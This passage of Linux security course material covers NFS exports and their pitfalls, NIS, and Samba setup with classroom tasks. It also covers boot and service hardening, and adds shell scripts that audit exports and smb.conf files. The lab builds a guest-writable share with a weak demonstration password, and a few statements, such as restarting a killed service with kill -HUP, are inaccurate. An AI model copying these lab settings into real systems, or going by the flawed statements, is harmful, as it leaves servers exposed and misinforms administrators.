The Basic tab has just a few fields to fill out to create the share. In the Directoryfield, you fill in the directory that you want to share (be sure that the directoryactually exists!). In the Hosts field, you fill in the hosts that are to access theshare. Then, select the permission level you want to grant for the share.

The General Options tab has several more fields to fill out, but none that arerequired to create the share. Finally, the User Access tab presents a few morefields you can fill out, such as the previously mentioned no_root_squash.


If you want to modify a currently existing NFS share, simply open the NFSServer configuration tool, select the rule, and click Properties. Likewise, to deletea rule, simply select the rule, and click Delete.

At any time, you can check the implementation of the NFS shares you are creat-ing by looking in the /etc/exports file, to be sure the configurations are as youwere expecting. All applied changes in the server tool will be visible in the /etc/exports file.

From the NFS client standpoint, the configuration is even more streamlined. Theclient computer requires portmap, rpc.statd, and rpc.lockd to be running, just asthey are required on the server. These services should be configured to start at thebootup process. Once those services are enabled, then the client configuration canhappen. There are a few ways to configure the client to use NFS.

The first option is to use the default mount command to mount the exporteddirectory. Even though this is a simple process, there is a downside to that con-figuration option—every time the system restarts, the root account will need toenter the mount command and reconnect to the shared directory. Furthermore, theroot account is required to unmount the shared directory every time the systemshuts down. Here are a couple of examples to show the configuration of a stan-dard mount command for an exported directory.

# NFS server 10.20.23.45 exports /home; mount it on the
# local host at /mnt/tmp/45/home
mount 10.20.23.45:/home /mnt/tmp/45/home
# NFS server host1.example.com exports /test; mount it on the
# local host at /test
mount host1.example.com:/test /test

As was mentioned, the standard mount commands are to be entered by the root account when the system starts up, and the mounts are to be unmounted by the root account as the system shuts down. In many situations it would be more efficient for that process to be automatic and not require manual input from the root account. This is done by adding the NFS file systems to the /etc/fstab file. This way, NFS mounts are added when the system starts up, in the same manner that local file systems are. The basic syntax of an /etc/fstab line is <device> <mountpoint> <fs-type> <options> <dump> <fsckorder>, where:

• Device is the location of the NFS exported directory.

• Mountpoint is the mount location on the local host.

• Fs-type is the file system type; here, it will be nfs.

• Options is the mount options, such as ro or rw.

• Dump is usually 0 for NFS shares.

• Fsckorder is usually 0 for NFS shares.

The following is an example of an NFS client /etc/fstab line. This line states that the NFS server host1.example.com exports the directory /scnp, that the local mount point is /mnt/certs/scnp, and that the access permissions are read and write.

host1.example.com:/scnp /mnt/certs/scnp nfs rw 0 0


TASK 3D-1
Sharing Data with NFS

Setup: For this task, students should work in pairs. You are logged onto Red Hat 8 as root, and a Terminal Window is open.

1. Create a directory called /nfs_share.

2. Add files and/or directories to the new folder by creating new files orcopying them from elsewhere.

3. From the Red Hat Main Menu, choose Server Settings→NFS Server toopen the NFS Server Configuration tool.

4. Click the Add button.

5. In the Directory field, browse to your nfs_share directory. You can alsotype the directory name into this field.

6. Change the permissions to Read and Write.

7. In the Hosts field, enter the IP address of your partner’s computer.

8. Click OK to accept the settings, and to close the Add NFS Share window.

9. Click the Apply button to force the changes to take effect. If you areprompted to start the NFS Service, click Yes.

10. Close the NFS Server Configuration tool, saving changes if prompted.

11. Create a directory named /mnt/nfs1.

12. In a Terminal Window, enter mount a.b.c.d:/nfs_share /mnt/nfs1 to mountto your partner’s NFS share. Be sure to replace a.b.c.d with your partner’s IPaddress.

13. Browse in your /mnt/nfs1 directory to see what files you now have accessto.

If you are denied access to the files, check the permissions on the nfs_share directory. The Others must have Read permissions in order to see thefiles in the NFS share.

14. Close all open windows.

Securing NFS

As you can see, NFS provides a straightforward method of sharing files and directories between hosts. You might also have seen that very few security controls are in place by default. You will need to take advantage of the controls that are available in order to provide a safe NFS environment.


You might have noticed that there were no authentication measures in the process of using NFS. The closest thing to authentication is the client's IP address: if it matches an address assigned to the export on the NFS server, access is granted. Other problems can exist with user IDs.

For example, assume User1 on the NFS server has a UID of 1234 and creates a file in a directory that is exported. User1 then sets the permissions so that only User1 has access to this file. If User2 (on another machine) also has a UID of 1234 and mounts the exported directory, User2 will have access to the object that was previously secured. Keeping UIDs consistent across hosts (for example through NIS, described below) or exporting with the all_squash option, which maps every client user to the anonymous account, reduces this exposure. Don’t despair, however; you can make NFS more secure than the default!

The primary service to secure for NFS is the portmap service. To start, be surethe portmap is protected by TCP wrappers, as per your design. It is recommendedthat the portmap service is provided only to those who specifically need it. Ifonly a small section of your internal network needs to use NFS, then yourportmap-specific TCP wrappers files will look something like this:

/etc/hosts.allow
portmap: 172.16.23.0/255.255.255.0

/etc/hosts.deny
portmap: ALL

Note that tcp_wrappers takes the network mask in dotted form; the example allows just the 172.16.23.0/24 subnet, and a /16 mask would open portmap to far more of the network than intended.

Another issue with NFS is that when you export a directory, you are also exporting its subdirectories, and clients get the same permissions on all of them. For example, you might want the 192.168.10.0/24 network to read the main exported directory, /scnp, but not the /scnp/results directory. Older user-space NFS servers accepted a second export line to deny the subdirectory:

/scnp 192.168.10.0/24(ro)
/scnp/results 192.168.10.0/24(noaccess)

The kernel NFS server shipped with nfs-utils (as on Red Hat 8) does not support the noaccess option, and exportfs rejects a line that uses it. On such a server, keep data that must not be shared out of the exported tree, or place it on a separate file system: the kernel server does not expose a file system mounted underneath an export unless that file system is exported as well.

Even though it may seem straightforward, another issue to watch out for is mak-ing mistakes in typing in what you want to be exported. A simple syntax errorcan export volumes that you did not want exported. Consider the ramifications ofthe following two lines, where there are slight differences:

/temp/db23/ 192.168.10.0/24(rw)
/temp/db23/ 192.168.10.0/24 (rw)

The difference is so minor you might not even see it at first. In the first line there is no space between the network address and the permissions, but in the second line there is a space. This space makes all the difference: in the second line the options (rw) are no longer attached to 192.168.10.0/24. exportfs treats an option list with no client in front of it as applying to every host, so /temp/db23/ is exported read-write to the world (exportfs warns with "No host name given with /temp/db23/ (rw), suggest *(rw)"), while 192.168.10.0/24 gets only the default read-only access.

After you create your NFS shares, regardless of how you create them, be sure that you verify the exporting is as desired. This can be done quickly from a Terminal Window with showmount -e <hostname>, which lists the exported directories and their client lists, and on the server itself with exportfs -v, which also shows the options in effect for each client.
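
The pitfalls in the last few paragraphs (an option list separated from its client by a space, an option word that ends up being read as a client name, exports to every host, and no_root_squash) are all visible in the text of /etc/exports, so they can be checked before exportfs is run. The following shell script is an added example written for this page; it is not from the course and not part of nfs-utils. It reports one WARN or INFO line per finding on a file in /etc/exports syntax. The sample file it writes is constructed for illustration and mixes correct lines with the mistakes discussed above; the script assumes one export per line and does not handle lines continued with a trailing backslash.

```sh
#!/bin/sh
# Audit an /etc/exports file for the mistakes discussed in the text.
# Added example, not part of the course material or of nfs-utils; the sample
# file it writes is constructed. Assumes one export per line (no backslash
# continuations).

# Print one WARN/INFO line per finding; a clean line prints nothing.
exports_audit() {
    awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }          # comments and blank lines
        {
            dir = $1
            if (NF == 1) {
                printf "WARN line %d: %s has no client list, so it is exported to ALL hosts\n", NR, dir
                next
            }
            for (i = 2; i <= NF; i++) {
                ent = $i
                # "(rw)" standing alone: the options apply to every host
                if (ent ~ /^\(/) {
                    printf "WARN line %d: %s exports %s to ALL hosts (space before the parenthesis?)\n", NR, dir, ent
                    continue
                }
                host = ent; opts = ""
                if (match(ent, /\(.*\)$/)) {
                    host = substr(ent, 1, RSTART - 1)
                    opts = substr(ent, RSTART + 1, RLENGTH - 2)
                } else if (ent ~ /^(rw|ro|sync|async|root_squash|no_root_squash|all_squash|subtree_check|no_subtree_check|secure|insecure)$/) {
                    # a bare option word is taken by exportfs as the name of another client
                    printf "WARN line %d: %s: entry \"%s\" is parsed as a CLIENT name, not an option; put it inside the parentheses\n", NR, dir, ent
                    continue
                } else {
                    printf "INFO line %d: %s to %s uses the default options (ro, root_squash)\n", NR, dir, host
                }
                if (host == "*") { printf "WARN line %d: %s is exported to * (all hosts)\n", NR, dir }
                if (opts ~ /(^|,)no_root_squash(,|$)/) { printf "WARN line %d: %s to %s lets remote root act as local root (no_root_squash)\n", NR, dir, host }
                if (opts ~ /(^|,)async(,|$)/) { printf "INFO line %d: %s to %s uses async; writes are acknowledged before they reach disk\n", NR, dir, host }
            }
        }
    ' "$1"
}

# Number of WARN findings for a file, printed as a plain integer.
exports_warn_count() {
    exports_audit "$1" | awk '/^WARN/ { n++ } END { print n + 0 }'
}

# Constructed sample mixing correct lines with the pitfalls from the text; echo its path.
make_sample_exports() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample /etc/exports
/R&D 172.16.55.63(rw)
/Policy 172.16.55.0/255.255.255.0(ro)
/Tech 192.168.20.0/24(rw) no_root_squash
/temp/db23/ 192.168.10.0/24 (rw)
/scnp 192.168.10.0/24(ro,sync)
/pub *(ro)
/home 10.20.23.45(rw,no_root_squash)
EOF
    echo "$f"
}

# Run against the sample; on a real server use: exports_audit /etc/exports
sample=$(make_sample_exports)
exports_audit "$sample"
echo "warnings: $(exports_warn_count "$sample")"
rm -f "$sample"
```

On the constructed file the script raises four warnings: the misplaced no_root_squash on the /Tech line, the world-wide (rw) on the /temp/db23/ line, the * client on /pub, and the no_root_squash granted to 10.20.23.45 on /home. The two correct lines, /R&D and /Policy, produce nothing, and the (ro,sync) export of /scnp is reported only as clean.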


TASK 3D-2
Verifying Export Permissions

Setup: You are logged on to Red Hat 8 as root.

1. Create four directories named /NFS_1 through /NFS_4.

2. Use the NFS Server Configuration tool to create the following exporteddirectories:

Directory: /NFS_1 ; Host: 192.168.10.1 ; Permissions: Read-Only

Directory: /NFS_2 ; Host: 172.16.10.2 ; Permissions: Read-Only

3. Apply the changes, and close the NFS Server Configuration tool. Savechanges if you are prompted to do so.

4. Navigate to the /etc/exports file, and open it in Emacs.

5. Add the following lines:

/NFS_3/ 192.168.10.1(ro,sync)

/NFS_4/ 172.16.10.2(rw,sync)

6. Save and close the file.

7. In a Terminal Window, enter exportfs -rav to enact the changes in the filethat you manually added.

8. Read the response provided on the screen.

9. In the Terminal Window, enter showmount -e <hostname> to check theexport permissions.

If the export permissions are not displayed by using the showmount com-mand, you can view them in the /etc/exports file or in the NFS ServerConfiguration Tool.

10. Observe the difference in the permissions for NFS_4 versus the othersyou added.

11. Close all open windows.

NIS

Network Information Service (NIS) was formerly called the Yellow Pages (or simply YP), and it is unlikely that you will be running it in a production environment. There are different versions of NIS, most notably NIS and NIS+. NIS+ has increased security built into it; however, development work on NIS+ has stopped, and it is not often implemented in a production environment.


NIS itself uses RPC and the client/server model to distribute login information (the /etc/passwd data: login names, passwords and home directories) and group information (/etc/group). The effect is that your password information is held in the NIS server's database, and you can log in to any machine on the network that runs the NIS client.

NIS Operation

In a network running NIS, there must be (at the minimum) one server running as the NIS Server. The NIS Server serves an NIS domain, which is a logical name for the grouping of computers that will use NIS together. Do not confuse this with a DNS domain name, or with a Microsoft domain. The NIS domain is unique to the function of NIS. The NIS terms for the servers that serve the domain are Master and Slave. There is one Master NIS Server and there can be multiple Slave NIS Servers.

The /etc/passwd and /etc/group files are converted to DBM format with makedbm, an ASCII-to-DBM conversion tool, so the Master NIS Server holds both the ASCII and the DBM version of each database. Each DBM database is called an NIS map, and the maps for a domain are kept in a directory named after it; for example, the maps for the domain Marketing live under /var/yp/Marketing.

Any time there is a change to the NIS maps, the Slave Servers are notified, fromthe yppush program, and synchronize their databases. NIS clients do not receivethis information, only the servers.

As networks become more complex, and as attacks get more sophisticated, youwill likely want to migrate to a more secure means of authentication across thenetwork. That means is Kerberos. Kerberos uses Secret-Key cryptography to pro-vide for secure communications. Detailed discussions of NIS and Kerberos areboth beyond the scope of this course.

What is Samba?

Samba is a suite of programs that makes use of the Server Message Block (SMB) Protocol. It is often used to solve the communication problems that Linux and Windows machines normally have when trying to share files. Samba makes it possible to share directories with Windows machines in a simple and straightforward manner that does not require the Windows clients to use anything other than their built-in networking utilities.

This touches on one of the problems that people had with file sharing beforeSamba. A Linux machine already running as an NFS server could share files withWindows machines, but the Windows client was required to run PC-NFS to gainaccess to the NFS shares. There were two primary problems with the NFS way ofsharing files:

• First, there was a cost attached to the use of the third party PC-NFS clientsoftware.

• Second was that the client software itself would often crash and cause prob-lems with PC applications.

crash:A sudden, usually drasticfailure of a computer system.


More Uses for Samba

All right, you now know that Samba can help you share files on a Linux machine so that Windows clients can access them. What if you want to access a shared directory on a Windows machine from a Linux machine? Fortunately, that ability is also built into Samba with the smbclient. To use smbclient to access a Windows share called marketing, on a machine called fuzzybunny, with the user account johni, you would enter the following command into a Terminal Window:

smbclient //fuzzybunny/marketing -U johni

Your request will be sent to fuzzybunny and you will be prompted for a passwordbefore being allowed to proceed.

Even though it is beyond the scope of this course, the Samba server can do farmore than just act as a means for sharing files; the Samba server can also:

• Be a NetBIOS name server.

• Support ACLs on printer and file shares.

• Act as a Windows NT Domain Controller.

• Engage in NetBIOS Browsing.

• Be a Master Browser for a Windows network.

• Support RPC-based and LanMan printing.

But even if Samba can perform any of these, or other, roles, it is still not a Win-dows server—the very machine that was designed to do those tasks. So whywould anyone replace a Windows machine, such as a file or print server, with aLinux machine running Samba? As usual, the bottom-line answer is often due tothe bottom line. Licensing costs for Windows NT Server can rapidly add up,while Red Hat Linux with Samba support can legally be had completely free ofcharge, excluding the cost of your bandwidth to download and burn the CDimages.

Samba’s Configuration Files

Editing the files needed to configure the Samba server so that it will share directories with the rest of your network is relatively straightforward, at least for a basic implementation. The file you will be most concerned with is smb.conf, which (in a default install) should be located in the /etc/samba/ directory. In the task for configuring Samba, you will be using a very simple configuration, but there are many more options that are available for you to use.

In broad terms, the smb.conf file is separated into two sections:

• The Global Settings section has settings that apply to the overall running ofthe server, such as the name of the workgroup and its description, IP restric-tions, guest accounts, logging, encryption use, Browser control modes,WINS and DNS settings, and security modes.

• The Share Definitions section defines the properties of the individual sharesthat are configured for the server.

Even though the configuration we will be using in the upcoming task will nothave too many parameters defined, we will still step through them here. Here isthe configuration you will be working with:

To explore these options, feel free to look at the default smb.conf file before you modify it. It has numerous sample configurations with explanations that will show many more of the options available to you.

Configuring Samba


# global settings
workgroup = workgroup
server string = Samba Server
hosts allow = 172.16.0. 172.17.0. 172.18.0. 127.
security = user
local master = no
name resolve order = host bcast
encrypt passwords = yes
smb passwd file = /etc/samba/smbpasswd
socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192
# share definition
[public share]
comment = public samba share
path = /samba_share
browseable = yes
public = yes
writable = yes

The first part of the file contains the Global Settings, which define the following:

• Workgroup—This field defines the name of the workgroup under which youwant the server to appear. The default is MYGROUP, but to be part of thesame workgroup that Windows uses by default, we will use workgroup.

• Server string—This field will display as text under the Comment field inNetwork Neighborhood.

• Hosts allow—This restricts access to the hosts or networks you define. Although not really important in the classroom, you should define your network and your loopback address here. For instance, if you are in the 172.16.0.0/16 network, to permit your peers and yourself to access the Samba share, your entry would look like this:

172.16. 127.

• Security—This sets the security mode to user level, in which the server accepts or rejects a session based on a user name and password. (In share-level security, the client authenticates itself separately for each share.)

• Local master—This line states that the Samba server will not become themaster browser in the network. If you want it to participate in the normalmaster browser elections, change the setting to yes (you should also definean OS level if you want it to have a chance of winning).

• Name resolve order—This line tells Samba to check its /etc/hosts file forname resolution. If no entry is found, then resort to a broadcast to resolvethe IP.

• Encrypt passwords and smb passwd file—These entries tell Samba to useencrypted passwords (that’s oversimplified for now; it deals with sendinghashes for the challenge/response system), and where the 16-byte hash val-ues are stored for Samba users (much in the way that the shadow file storeshashed passwords for normal users).

• Socket options—These options are simply for performance.

Be aware that there is aperiod after the 16, a singlespace between that periodand the 127, and a periodafter the 127.


The second part of the file has the Share Definitions, which define the following:

• [public share]—Sets the name for the share.

• Comment—Sets the comment that clients browsing the network will see forthe share.

• Path—Indicates where the real shared directory can be found for the share.

• Browseable—Defines whether clients will be able to find the share bybrowsing Network Neighborhood.

• Public—Setting this to yes means that the share is not restricted to authenticated users: guests may connect to it without a password (public is a synonym for guest ok).

• Writable—Permission selection, defines that users are able to write to theshare.
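
Read together, the share above is a guest share that is also writable, and the only thing standing between it and the rest of the network is the hosts allow line in the global settings. The following shell script is an added example written for this page; it is not from the course and not part of Samba. It parses an smb.conf into sections the way Samba does (parameters before the first section header are global; public, guest ok, writable, writeable and read only are treated as the synonyms they are) and warns about any share that is both guest-accessible and writable, about a global section with no hosts allow, and about encrypt passwords not being set to yes. The sample file it writes is constructed for illustration and follows the configuration used in the task, with one authenticated-only share added.

```sh
#!/bin/sh
# Audit an smb.conf for world-writable guest shares, a missing "hosts allow"
# and unencrypted passwords. Added example, not part of the course material
# or of Samba; the sample file it writes is constructed. Parameters before
# the first section header are treated as global, as Samba does.

smb_audit() {
    awk '
        function trim(s) { gsub(/^[[:space:]]+|[[:space:]]+$/, "", s); return s }
        # record or report the section that just ended
        function finish() {
            if (section == "global") { g_hosts = g_hosts || hosts; g_encrypt = g_encrypt || encrypt }
            else if (guest && writable) printf "WARN share [%s]: guest access AND write access; anyone on an allowed host can write to %s\n", section, path
        }
        function reset() { guest = 0; writable = 0; hosts = 0; encrypt = 0; path = "(no path)" }
        BEGIN { section = "global"; reset() }
        /^[[:space:]]*[;#]/ || /^[[:space:]]*$/ { next }        # comments and blank lines
        /^[[:space:]]*\[/ {                                       # [section] header
            finish()
            section = $0; sub(/^[[:space:]]*\[/, "", section); sub(/\].*$/, "", section)
            section = tolower(trim(section)); reset(); next
        }
        /=/ {
            i = index($0, "=")
            key = tolower(trim(substr($0, 1, i - 1)))
            raw = trim(substr($0, i + 1))
            val = tolower(raw)
            if (key == "public" || key == "guest ok")     guest = (val == "yes")
            if (key == "writable" || key == "writeable") writable = (val == "yes")
            if (key == "read only")                      writable = (val == "no")
            if (key == "path")                           path = raw
            if (key == "hosts allow")                    hosts = 1
            if (key == "encrypt passwords")              encrypt = (val == "yes")
        }
        END {
            finish()
            if (!g_hosts)   print "WARN [global]: no \"hosts allow\"; every host that can reach the SMB port may attempt to authenticate"
            if (!g_encrypt) print "WARN [global]: \"encrypt passwords = yes\" not set; Samba 2.x then expects plaintext passwords from clients"
        }
    ' "$1"
}

# Number of WARN findings for a file, printed as a plain integer.
smb_warn_count() {
    smb_audit "$1" | awk '/^WARN/ { n++ } END { print n + 0 }'
}

# Constructed sample after the configuration in the task, plus one authenticated-only share.
make_sample_smbconf() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample smb.conf
workgroup = workgroup
server string = Samba Server
hosts allow = 172.16.0. 172.17.0. 172.18.0. 127.
security = user
local master = no
name resolve order = host bcast
encrypt passwords = yes
smb passwd file = /etc/samba/smbpasswd
socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192
[public share]
comment = public samba share
path = /samba_share
browseable = yes
public = yes
writable = yes
[projects]
comment = staff projects, authenticated users only
path = /srv/projects
valid users = administrator_bob
writable = yes
EOF
    echo "$f"
}

# Run against the sample; on a real server use: smb_audit /etc/samba/smb.conf
sample=$(make_sample_smbconf)
smb_audit "$sample"
echo "warnings: $(smb_warn_count "$sample")"
rm -f "$sample"
```

On the constructed file the only finding is the [public share] section; [projects] is writable but not a guest share, and the global section has both hosts allow and encrypted passwords. Removing the hosts allow line adds a second warning, which is the case to look for on a server that was set up "for the classroom" and then left in place.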

Running and Maintaining Samba

It should be obvious that before users can connect to the Samba server, there need to be user accounts for the Samba server to authenticate users against. To create these accounts specific to Samba, use the smbpasswd -a command. The user account must already exist on the Linux system. This command adds the user name to the local smbpasswd file with the password given. For example, to add the account administrator_bob with a password of administrator to the local /etc/samba/smbpasswd file, you would use this command:

smbpasswd -a administrator_bob administrator

The password can be given on the command line as shown, but it is safer to omit it and let smbpasswd prompt for it, because anything typed on the command line ends up in the shell history and, while the command runs, is visible to other users through ps.

Once changes have been made to the smb.conf file, you need to tell the machine to account for these changes and reapply the configuration. You can do this by restarting the Samba service with its init script (on Red Hat, service smb restart does the same thing). To stop, start, or, in one command, stop and restart the Samba service, you can use any of these commands:

• /etc/rc.d/init.d/smb stop

• /etc/rc.d/init.d/smb start

• /etc/rc.d/init.d/smb restart

Once Samba is configured and running, any Windows client that is allowed to use Network Neighborhood (or My Network Places, as the case may be) will be able to find the Samba server, as long as the share has been marked as browseable = yes.
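As an added example (not part of the course materials), the following POSIX shell script audits an smb.conf for the global and share settings discussed above: encrypted passwords, user-level security, a hosts allow restriction, and a share that is both public and writable. The helper names smb_get and smb_audit are hypothetical, and the two sample configuration files are constructed here so the script runs offline.

```shell
#!/bin/sh
# Added example, not from the course: audit an smb.conf for the global and
# share settings discussed in the text. smb_get/smb_audit are hypothetical
# helper names; the sample files below are constructed for the demonstration.

# smb_get FILE KEY : print the value of the first "KEY = value" line in FILE
# (key compared case-insensitively, surrounding whitespace stripped)
smb_get() {
    awk -v key="$2" -F'=' '
        { k = $1; gsub(/^[ \t]+|[ \t]+$/, "", k) }
        tolower(k) == tolower(key) {
            v = $0; sub(/^[^=]*=[ \t]*/, "", v); sub(/[ \t]+$/, "", v)
            print v; exit
        }' "$1"
}

# smb_audit FILE : print one WARN line per weak setting; exit status is the count
smb_audit() {
    f="$1"; n=0
    if [ "$(smb_get "$f" 'encrypt passwords')" != "yes" ]; then
        echo "WARN: encrypt passwords is not yes; challenge/response hashes are not used"
        n=$((n + 1))
    fi
    if [ "$(smb_get "$f" 'security')" != "user" ]; then
        echo "WARN: security is not user; clients are not authenticated per account"
        n=$((n + 1))
    fi
    if [ -z "$(smb_get "$f" 'hosts allow')" ]; then
        echo "WARN: no hosts allow line; any host that reaches the port may connect"
        n=$((n + 1))
    fi
    if [ "$(smb_get "$f" 'public')" = "yes" ] && [ "$(smb_get "$f" 'writable')" = "yes" ]; then
        echo "WARN: share is both public and writable; unauthenticated users can write to it"
        n=$((n + 1))
    fi
    return "$n"
}

# Constructed sample files (not real configurations).
SMB_DEMO=$(mktemp -d)
cat > "$SMB_DEMO/weak.conf" <<'EOF'
[global]
workgroup = workgroup
security = share
encrypt passwords = no
[public share]
path = /samba_share
public = yes
writable = yes
EOF
cat > "$SMB_DEMO/hardened.conf" <<'EOF'
[global]
workgroup = workgroup
hosts allow = 172.16. 172.17. 172.18. 127.
security = user
encrypt passwords = yes
smb passwd file = /etc/samba/smbpasswd
[public share]
path = /samba_share
browseable = yes
public = no
writable = yes
EOF

smb_audit "$SMB_DEMO/weak.conf" || echo "weak.conf: $? warning(s)"
smb_audit "$SMB_DEMO/hardened.conf" && echo "hardened.conf: no warnings"
```

The classroom share built later in this task is deliberately public and writable, so the last check would flag it; that is the trade-off the exercise accepts for a lab.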

Figure 3-23: The Samba server shows up in My Network Places.


Double-clicking the Samba server, like any other machine in the network, will make the computer try to authenticate the incoming request before continuing. After the browsing computer has authenticated, a list of shares is presented to the user.

Figure 3-24: The Samba share as seen by administrator_bob.

TASK 3D-3: Configuring the Samba Server

Objective: For this task, we will create a simple public share that Windows clients will be able to access on our Linux server.

Setup: Students should work in pairs for this exercise. One student will use Windows 2000 Server and the other Red Hat Linux 8.0. If time permits, the task should be done twice with the Windows and Linux roles reversed, so that both students can perform the Linux install and be the Windows client.

Note: Perform step 1 through step 22 only if you have been designated as the Linux user.

1. On the Linux machine, from the Red Hat Main Menu, choose System Settings→Users And Groups to prepare to create a user account for the Windows user who will be connecting to the share.

2. Click the Add User button.

3. Set the User Name to administrator_bob. Set the Password to administrator, and confirm the typing of the password.

4. Click OK to add the new user. Close User Manager.

5. Open the Nautilus File Manager to prepare to create the file that will be used for the public share.

6. Under Location, change /root to /, and press Enter.

7. In the open space displaying the directories under /, right-click and choose New Folder. Name the folder samba_share.

If NetBIOS has been disabled for any reason in Windows, it should be re-enabled for this task.


8. Right-click the new folder and choose Properties.

9. On the Permissions tab, change the permissions so that owner, group, and others all have read, write, and execute permissions. Observe how the text and numerical views change as you check or uncheck the boxes. This might help you better understand the relationship between the types of permissions displays. Click Close.

10. Navigate to and open the /etc/samba directory.

11. Right-click the smb.conf file and choose Copy File. Paste the copy into the same folder by deselecting the file and right-clicking in the open space of the folder and choosing Paste File.

12. Right-click the copy and choose Properties. Change the name of the file to smb.conf.bak. Although it’s not quite necessary to do it in this case, it is usually a very good idea to make a backup of a working configuration file before you make any changes to it.

13. After your backup has been made, right-click the smb.conf file and open it in Emacs.

14. Take a quick look through the sample config to become familiar with some of the things you can do with Samba, then select and delete all of the text in the file.

15. Enter the following lines:

# global settings
workgroup = workgroup
server string = Samba Server
hosts allow = 172.16. 172.17. 172.18. 127.
security = user
local master = no
name resolve order = host bcast
encrypt passwords = yes
smb passwd file = /etc/samba/smbpasswd
socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192
# share definition
[public share]
comment = public samba share
path = /samba_share
browseable = yes
public = yes
writable = yes

If you like, you can use any other text editor, such as OpenOffice or jpico.


16. Save your changes and close the file.

17. To test your configuration changes for syntax errors, open a Terminal Window and enter testparm. Examine the results displayed, press Enter to view the service definitions, correct any errors (typos are usually to blame), and retest before you proceed.

18. In the Terminal Window, enter smbpasswd -a administrator_bob administrator to add the user you created earlier to the list of users who can access Samba shares with an encrypted password.

If you see an error message, re-enter the command.

19. In the Nautilus File Manager, find the /etc/services file, and verify that it contains this line: swat 901/tcp to provide SWAT functionality. If necessary, add the line and save the file.

20. Find the /etc/xinetd.conf file, and edit it to add the following line: swat stream tcp nowait,400 root /usr/sbin/swat swat, then save and close the file.

21. In the Terminal Window, enter /etc/rc.d/init.d/smb start to start your Samba server. You should see two starting responses.

22. Give your machine a few minutes to update the local network, then ask your partner to complete the rest of the task.

Note: Perform the rest of this task only if you have been designated as the Windows user.

23. At the Windows 2000 Server machine, log on as administrator, and open My Network Places.

24. Verify that you can see the Samba Server in the workgroup. This share can also be reached like any other normal share in a Windows network by using normal UNCs (\\ServerName\public share). This would be even more valuable information if the share were marked as not browsable.

If you are using OpenOffice, when you choose to save, you will see a pop-up asking if you want to save it in the OpenOffice.Org 1.0 text document format. Click No, then when you go to close OpenOffice.Org, you will be given another warning telling you that saving in external formats may have caused information loss. When you are asked if you still want to close, click Yes.

If swat is not installed in the default location of /usr/bin, alter the line to match the location of your swat file.

If your partner’s machine is unavailable, check the smb.conf file to ensure that the hosts allow line is accurate.


25. Double-click the icon for the Linux machine, and log in using the credentials your partner entered earlier in the task.

26. Reboot and log in to Linux as root.

Topic 3E: Final OS Hardening

In this topic, you will investigate several additional hardening methods, including securing the system startup and shutdown processes, logging, Tripwire, and Bastille.

System Startup/Shutdown Security

Up to this point, all the security issues addressed were ones that required the system to be up and running, and interacting with clients and other computers. There are things you can do to affect the overall security of the machine, even before the system is fully loaded and operational.

The computer’s boot loader is the small file that allows the computer to load the operating system, and often presents the computer user with a small menu of OSs to load. In Linux, the boot loader is usually LILO (which stands for Linux Loader). LILO is configured at the end of the installation process, but it can be modified later for added security. Figure 3-25 shows an example LILO file that has not been altered since the install of the OS.

Figure 3-25: A Linux lilo.conf file.

Hardening Startup and Shutdown Routines


The primary item to add to the LILO file is the ability to add a password. An example syntax is simply password=L1L0_p@s5. The LILO file is not encrypted, and the password will be stored in cleartext in the file. This means that you will need to secure the file so that users, other than the root account, cannot read it. It is also suggested that you implement a password on the computer’s BIOS, and if the option exists, disable the use of the floppy disk drive.

The opposite end of the spectrum is the process of shutting down the system. Linux has a specific sequence of events that happens during the shutdown process. The general process of bringing down a Linux system by using the shutdown command is detailed in the following four steps:

1. Notifies other processes and user accounts that the shutdown is imminent.

2. Shuts down the other processes that are still running.

3. Notifies root of the services that are shut down.

4. Reboots the system (if specified).

The shutdown command can be run only by the root account. The file is located in /sbin/shutdown, and has two common switches. Using the -r option reboots the system, and using the -h option halts the system. (Halt means that the system will power down.)

Shutting down the system properly—not just hitting the power switch—and letting the system complete the shutdown process is important. A system that is not shut down properly might not unmount partitions, leading to system corruption.

Consider changing the permissions on the shutdown command. If the majority of the users of the system were connecting remotely, you would likely want that command to be available only to the root account. If they are local users, you might decide to have the command available to everyone.

Removing Services

One of the fundamental steps in hardening any OS is to remove, or disable, services and unwanted aspects of the OS that are not going to be used, without affecting the OS’s functionality. From the Terminal Window, you can kill the services one at a time, as you wish.

You can use the kill utility to end a service. When executed, the kill utility sends a signal to the service, which is identified by the PID. If no signal is specified in the syntax of the command, a TERM (terminate) signal is sent. The initial syntax is simply kill <PID>. If you need to restart the service after it has been killed (if you have made changes to it, for example), just add the -HUP switch, for a command syntax of kill -HUP <PID>.

Another great tool for disabling services is the Service Configuration tool. This tool allows for the quick visual check of running services, and enables you to use check boxes to start and stop services, without having to resort to using the command syntax. Figure 3-26 shows the Service Configuration tool.


Remember, to find Process IDs for running services, use the ps command.


Figure 3-26: The Service Configuration tool in Red Hat Linux.

A great feature of this tool, as you can see from the image, is that there is a short description of each service. For example, the highlighted service could probably be turned off on a desktop computer. This is helpful for the services you are not sure about. If you are still unsure, even after reading the short description, you must do more research before changing your system. Turning off the wrong service can have drastic consequences, so you should attempt to do so only if you are certain of the results.

TASK 3E-1: Stopping Unneeded Services

Setup: You are logged in to Linux as root.

1. In a Terminal Window, enter serviceconf to start the Service Configuration tool.

2. Scroll through the list, and examine the processes that you can stop, such as apmd.

3. Stop the apmd service, click Save, and quit the Service Configuration tool.


Linux Run Levels

In the Service Configuration tool, you might have noticed a Runlevel indicator. The run levels of Linux are the basic modes of operation. An analogy for Windows users is running in Safe Mode, because that is a different mode of operation for the OS. Linux has six different run levels:

• 0: Halt the System

• 1: Single-user Mode

• 2: Multi-user Mode (without NFS)

• 3: Multi-user Mode

• 5: Multi-user Mode, with a Graphical Login

• 6: Reboot the System

For most systems, the default is to use a run level of 5. If you want to have the system load into a text-mode login, then use run level 3. Levels 1 and 2 are rarely used.

A program called init is responsible for starting and stopping processes based on run level. You can manually enter a runlevel command. For example, to shut down and halt the system you can use the telinit 0 command; to shut down and reboot the system, you can use telinit 6.

SSH

Even though you use telnet often in this class, and perhaps in the office, the behavior of telnet is not secure enough for organizations that require high levels of security. The reason that telnet is not considered to be secure enough is that the authentication of telnet is carried out in cleartext. Anyone sniffing the segment can learn the user name and password for telnet authentication.

